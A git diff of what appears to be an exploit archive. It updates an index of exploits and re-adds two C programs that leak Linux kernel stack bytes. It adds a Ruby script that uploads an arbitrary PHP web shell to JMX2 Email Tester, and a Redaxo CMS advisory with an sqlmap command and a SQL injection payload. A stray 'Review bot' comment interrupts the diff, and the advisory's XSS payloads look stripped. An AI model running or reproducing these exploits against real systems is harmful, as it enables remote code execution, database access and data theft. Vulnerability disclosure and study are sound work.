diff --git a/files.csv b/files.csv
index 13faba61a..cf6cf6586 100755
--- a/files.csv
+++ b/files.csv
@@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
-9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
+9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
 9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
@@ -8978,7 +8978,7 @@ id,file,description,date,author,platform,type,port
 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
 9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
-9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
+9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
@@ -8986,7 +8986,7 @@ id,file,description,date,author,platform,type,port
 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
-9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
+9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
@@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
-15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
+15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0
@@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
-21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
-21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
+21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
+21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
@@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
 32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
-32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
+32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
 32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
@@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
+39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
+39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
diff --git a/platforms/linux/local/9352.c b/platforms/linux/local/9352.c
index 16a8d3a48..77aa1716e 100755
--- a/platforms/linux/local/9352.c
+++ b/platforms/linux/local/9352.c
@@ -1,121 +1,121 @@
-/*
- * sigaltstack-leak.c
- *
- * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
- * Jon Oberheide
- * http://jon.oberheide.org
- *
- * Information:
- *
- * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
- *
- * Ulrich Drepper correctly points out that there is generally padding in
- * the structure on 64-bit hosts, and that copying the structure from
- * kernel to user space can leak information from the kernel stack in those
- * padding bytes.
- *
- * Notes:
- *
- * Only 4 bytes of uninitialized kernel stack are leaked in the padding
- * between stack_t's ss_flags and ss_size. The disclosure only affects
- * affects 64-bit hosts.
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-const int randcalls[] = {
- 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
- 21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
- 78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
- 109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
- 120, 121, 121, 123, 124, 125, 140, 141, 143, 146
-};
-
-void
-dump(const unsigned char *p, unsigned l)
-{
- printf("stack_t:");
- while (l > 0) {
- printf(" ");
- if (l == 12) {
- printf("*** ");
- }
- printf("%02x", *p);
- if (l == 9) {
- printf(" ***");
- }
- ++p; --l;
- }
- printf("\n");
-}
-
-int
-main(void)
-{
- char *p;
- int call, ret;
- size_t size, ftest, stest;
- stack_t oss;
-
- size = sizeof(stack_t);
-
- printf("[+] Checking platform...\n");
-
- if (size == 24) {
- printf("[+] sizeof(stack_t) = %zu\n", size);
- printf("[+] Correct size, 64-bit platform.\n");
- } else {
- printf("[-] sizeof(stack_t) = %zu\n", size);
- printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
- printf("[-] No information disclosure is possible.\n");
- exit(1);
- }
-
- ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
- stest = offsetof(stack_t, ss_size);
-
- printf("[+] Checking for stack_t hole...\n");
-
- if (ftest != stest) {
- printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
- printf("[+] Hole in stack_t present!\n", ftest, stest);
- } else {
- printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
- printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
- exit(1);
- }
-
- printf("[+] Ready to call sigaltstack.\n\n");
-
- for (ret = 5; ret > 0; ret--) {
- printf("%d...\n", ret);
- sleep(1);
- }
- srand(time(NULL));
-
- while (1) {
- /* random stuff to make stack pseudo-interesting */
- call = rand() % (sizeof(randcalls) / sizeof(int));
- syscall(randcalls[call]);
-
- ret = sigaltstack(NULL, &oss);
- if (ret != 0) {
- printf("[-] Error: sigaltstack failed.\n");
- exit(1);
- }
-
- dump((unsigned char *) &oss, sizeof(oss));
- }
-
- return 0;
-}
-
-// milw0rm.com [2009-08-04]
+/*
+ * sigaltstack-leak.c
+ *
+ * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
+ * Jon Oberheide
+ * http://jon.oberheide.org
+ *
+ * Information:
+ *
+ * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
+ *
+ * Ulrich Drepper correctly points out that there is generally padding in
+ * the structure on 64-bit hosts, and that copying the structure from
+ * kernel to user space can leak information from the kernel stack in those
+ * padding bytes.
+ *
+ * Notes:
+ *
+ * Only 4 bytes of uninitialized kernel stack are leaked in the padding
+ * between stack_t's ss_flags and ss_size. The disclosure only affects
+ * affects 64-bit hosts.
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+const int randcalls[] = {
+ 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
+ 21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
+ 78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
+ 109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
+ 120, 121, 121, 123, 124, 125, 140, 141, 143, 146
+};
+
+void
+dump(const unsigned char *p, unsigned l)
+{
+ printf("stack_t:");
+ while (l > 0) {
+ printf(" ");
+ if (l == 12) {
+ printf("*** ");
+ }
+ printf("%02x", *p);
+ if (l == 9) {
+ printf(" ***");
+ }
+ ++p; --l;
+ }
+ printf("\n");
+}
+
+int
+main(void)
+{
+ char *p;
+ int call, ret;
+ size_t size, ftest, stest;
+ stack_t oss;
+
+ size = sizeof(stack_t);
+
+ printf("[+] Checking platform...\n");
+
+ if (size == 24) {
+ printf("[+] sizeof(stack_t) = %zu\n", size);
+ printf("[+] Correct size, 64-bit platform.\n");
+ } else {
+ printf("[-] sizeof(stack_t) = %zu\n", size);
+ printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
+ printf("[-] No information disclosure is possible.\n");
+ exit(1);
+ }
+
+ ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
+ stest = offsetof(stack_t, ss_size);
+
+ printf("[+] Checking for stack_t hole...\n");
+
+ if (ftest != stest) {
+ printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
+ printf("[+] Hole in stack_t present!\n", ftest, stest);
+ } else {
+ printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
+ printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
+ exit(1);
+ }
+
+ printf("[+] Ready to call sigaltstack.\n\n");
+
+ for (ret = 5; ret > 0; ret--) {
+ printf("%d...\n", ret);
+ sleep(1);
+ }
+ srand(time(NULL));
+
+ while (1) {
+ /* random stuff to make stack pseudo-interesting */
+ call = rand() % (sizeof(randcalls) / sizeof(int));
+ syscall(randcalls[call]);
+
+ ret = sigaltstack(NULL, &oss);
+ if (ret != 0) {
+ printf("[-] Error: sigaltstack failed.\n");
+ exit(1);
+ }
+
+ dump((unsigned char *) &oss, sizeof(oss));
+ }
+
+ return 0;
+}
+
+// milw0rm.com [2009-08-04]
diff --git a/platforms/linux/local/9513.c b/platforms/linux/local/9513.c
index 78d8b1a3a..f879bf739 100755
--- a/platforms/linux/local/9513.c
+++ b/platforms/linux/local/9513.c
@@ -1,146 +1,146 @@
-/*
- * llc-getsockname-leak.c
- *
- * Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
- * Jon Oberheide
- * http://jon.oberheide.org
- *
- * Information:
- *
- * http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
- *
- * sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
- * before copying to the above layer's structure.
- *
- * Notes:
- *
- * Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
- * as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
- * bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#ifndef AF_LLC
-#define AF_LLC 26
-#endif
-
-#ifndef AF_LLC
-#define AF_LLC 26
-#endif
-
-#ifndef LLC_SAP_NULL
-#define LLC_SAP_NULL 0x00
-#endif
-
-#ifndef __LLC_SOCK_SIZE__
-#define __LLC_SOCK_SIZE__ 16
-struct sockaddr_llc {
- sa_family_t sllc_family;
- sa_family_t sllc_arphrd;
- unsigned char sllc_test;
- unsigned char sllc_xid;
- unsigned char sllc_ua;
- unsigned char sllc_sap;
- unsigned char sllc_mac[6];
- unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
- sizeof(unsigned char) * 4 - 6];
-};
-#endif
-
-const int randcalls[] = {
- __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
- __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
- __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
- __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
- __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
- __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
- __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
- __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
- __NR_sched_getparam, __NR_sched_get_priority_max
-};
-
-void
-dump(const unsigned char *p, unsigned l)
-{
- printf("sockaddr_llc:");
- while (l > 0) {
- printf(" ");
- if (l == 12 || l == 2) {
- printf("*** ");
- }
- printf("%02x", *p);
- if (l == 10 || l == 1) {
- printf(" ***");
- }
- ++p; --l;
- }
- printf("\n");
-}
-
-int
-main(void)
-{
- struct sockaddr_llc sllc;
- int ret, sock, call, sllc_len = sizeof(sllc);
-
- printf("[+] Creating AF_LLC socket.\n");
-
- sock = socket(AF_LLC, SOCK_DGRAM, 0);
- if (sock == -1) {
- printf("[-] Error: Couldn't create AF_LLC socket.\n");
- printf("[-] %s.\n", strerror(errno));
- exit(1);
- }
-
- memset(&sllc, 0, sllc_len);
-
- sllc.sllc_family = AF_LLC;
- sllc.sllc_arphrd = ARPHRD_ETHER;
- sllc.sllc_sap = LLC_SAP_NULL;
-
- printf("[+] Dummy sendto to autobind socket.\n");
-
- ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
- if (ret == -1) {
- printf("[-] Error: sendto failed.\n");
- printf("[-] %s.\n", strerror(errno));
- exit(1);
- }
-
- printf("[+] Ready to call getsockname.\n\n");
-
- for (ret = 5; ret > 0; ret--) {
- printf("%d...\n", ret);
- sleep(1);
- }
- srand(time(NULL));
-
- while (1) {
- /* random stuff to make stack pseudo-interesting */
- call = rand() % (sizeof(randcalls) / sizeof(int));
- syscall(randcalls[call]);
-
- ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
- if (ret != 0) {
- printf("[-] Error: getsockname failed.\n");
- printf("[-] %s.\n", strerror(errno));
- exit(1);
- }
-
- dump((unsigned char *) &sllc, sizeof(sllc));
- }
-
- return 0;
-}
-
-// milw0rm.com [2009-08-25]
+/*
+ * llc-getsockname-leak.c
+ *
+ * Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
+ * Jon Oberheide
+ * http://jon.oberheide.org
+ *
+ * Information:
+ *
+ * http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
+ *
+ * sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
+ * before copying to the above layer's structure.
+ *
+ * Notes:
+ *
+ * Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
+ * as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
+ * bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#ifndef AF_LLC
+#define AF_LLC 26
+#endif
+
+#ifndef AF_LLC
+#define AF_LLC 26
+#endif
+
+#ifndef LLC_SAP_NULL
+#define LLC_SAP_NULL 0x00
+#endif
+
+#ifndef __LLC_SOCK_SIZE__
+#define __LLC_SOCK_SIZE__ 16
+struct sockaddr_llc {
+ sa_family_t sllc_family;
+ sa_family_t sllc_arphrd;
+ unsigned char sllc_test;
+ unsigned char sllc_xid;
+ unsigned char sllc_ua;
+ unsigned char sllc_sap;
+ unsigned char sllc_mac[6];
+ unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
+ sizeof(unsigned char) * 4 - 6];
+};
+#endif
+
+const int randcalls[] = {
+ __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
+ __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
+ __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
+ __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
+ __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
+ __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
+ __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
+ __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
+ __NR_sched_getparam, __NR_sched_get_priority_max
+};
+
+void
+dump(const unsigned char *p, unsigned l)
+{
+ printf("sockaddr_llc:");
+ while (l > 0) {
+ printf(" ");
+ if (l == 12 || l == 2) {
+ printf("*** ");
+ }
+ printf("%02x", *p);
+ if (l == 10 || l == 1) {
+ printf(" ***");
+ }
+ ++p; --l;
+ }
+ printf("\n");
+}
+
+int
+main(void)
+{
+ struct sockaddr_llc sllc;
+ int ret, sock, call, sllc_len = sizeof(sllc);
+
+ printf("[+] Creating AF_LLC socket.\n");
+
+ sock = socket(AF_LLC, SOCK_DGRAM, 0);
+ if (sock == -1) {
+ printf("[-] Error: Couldn't create AF_LLC socket.\n");
+ printf("[-] %s.\n", strerror(errno));
+ exit(1);
+ }
+
+ memset(&sllc, 0, sllc_len);
+
+ sllc.sllc_family = AF_LLC;
+ sllc.sllc_arphrd = ARPHRD_ETHER;
+ sllc.sllc_sap = LLC_SAP_NULL;
+
+ printf("[+] Dummy sendto to autobind socket.\n");
+
+ ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
+ if (ret == -1) {
+ printf("[-] Error: sendto failed.\n");
+ printf("[-] %s.\n", strerror(errno));
+ exit(1);
+ }
+
+ printf("[+] Ready to call getsockname.\n\n");
+
+ for (ret = 5; ret > 0; ret--) {
+ printf("%d...\n", ret);
+ sleep(1);
+ }
+ srand(time(NULL));
+
+ while (1) {
+ /* random stuff to make stack pseudo-interesting */
+ call = rand() % (sizeof(randcalls) / sizeof(int));
+ syscall(randcalls[call]);
+
+ ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
+ if (ret != 0) {
+ printf("[-] Error: getsockname failed.\n");
+ printf("[-] %s.\n", strerror(errno));
+ exit(1);
+ }
+
+ dump((unsigned char *) &sllc, sizeof(sllc));
+ }
+
+ return 0;
+}
+
+// milw0rm.com [2009-08-25]
diff --git a/platforms/multiple/webapps/39456.rb b/platforms/multiple/webapps/39456.rb
new file mode 100755
index 000000000..eccb6c044
--- /dev/null
+++ b/platforms/multiple/webapps/39456.rb
@@ -0,0 +1,45 @@
+# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
+# Date: 2016-02-15
+# Blog: http://www.hahwul.com
+# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
+# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
+# Tested on: debian [wheezy]
+# CVE : none
+
+require "net/http"
+require "uri"
+require 'uri-handler'
+
+if ARGV.length != 2
+
+puts "JMX2 Email Tester Web Shell Uploader"
+puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
+puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
+puts " phpCode(ex): echo 'zzzzz'"
+puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
+puts " Install GEM: #> gem install uri-handler"
+puts " exploit & code by hahwul[www.hahwul.com]"
+else
+target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
+shell = ARGV[1] # PHP Code
+shell = shell.to_uri
+exp_url = target_url + "/models/save_email.php"
+puts shell
+uri = URI.parse(exp_url)
+http = Net::HTTP.new(uri.host, uri.port)
+puts exp_url
+request = Net::HTTP::Post.new(uri.request_uri)
+request["Accept-Encoding"] = "gzip, deflate"
+request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
+request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
+request["Accept"] = "application/json, text/javascript, */*; q=0.01"
+request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
+request["Connection"] = "keep-alive"
+request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
+response = http.request(request)
+
+puts "[Result] Status code: "+response.code
+puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
+end
+
+
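Review bot: The `thecontent` value handed to `request.set_form_data` is already percent-encoded (`%3Chtml%3E...`), and `set_form_data` form-encodes every value a second time, so the server receives the literal `%3C...` text unless `save_email.php` decodes it again; the script does not say which behaviour it relies on. A comment on that line such as `# thecontent is pre-encoded and gets form-encoded again; presumes save_email.php decodes it a second time (unverified)` would tell anyone reproducing the test in a lab what to expect. The hard-coded `orgfilename`/`inlinefilename` values are likewise unexplained; a line like `# inlinefilename appears to be written verbatim under _saved_email_files/ - the absent extension allow-list is what this test demonstrates` documents what a server-side fix has to check. The header block could also state that the only reason for the third-party `uri-handler` gem is `shell.to_uri`, so a reader knows what the `Install GEM` line is for.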
diff --git a/platforms/php/webapps/39459.txt b/platforms/php/webapps/39459.txt
new file mode 100755
index 000000000..e985e769a
--- /dev/null
+++ b/platforms/php/webapps/39459.txt
@@ -0,0 +1,70 @@
+=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 ===
+
+Redaxo CMS contains multiple vulnerabilities
+-------------------------------------------------------------
+
+Problem Overview
+================
+Technical Risk: high
+Likelihood of Exploitation: medium
+Vendor: https://www.redaxo.org/
+Tested version: Redaxo CMS v5.0.0
+Credits: LSE Leading Security Experts GmbH employee Tim Herres
+Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt
+Advisory Status: Public
+CVE-Number: na
+
+Impact
+======
+Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS.
+During internal research, multiple vulnerabilities were identified in the Redaxo CMS software.
+The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way.
+Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way
+resulting in a Cross Site Scripting vulnerability.
+
+Issue Description
+=================
+The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities.
+1) SQL Injection in the "Mediapool" component:
+Authentication required: yes
+User needs access to the "Mediapool".
+
+POC:
+Exploitation using SQL Map
+sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name
+
+Parameter: media_name (GET)
+Type: stacked queries
+Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
+Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=
+
+2) Reflected XSS
+Authentication required: yes
+Used browser: FF42
+Example:
+https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.&opener_input_field=
+
+3) Stored XSS (persistent XSS)
+Authentication required: yes
+Used browser: FF42
+It is possible to store JavaScript Code in input fields.
+Example:
+Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field
+Payload:
+Response:
+[...]
+[...]href="index.php?page=mediapool/structure&cat_id=801">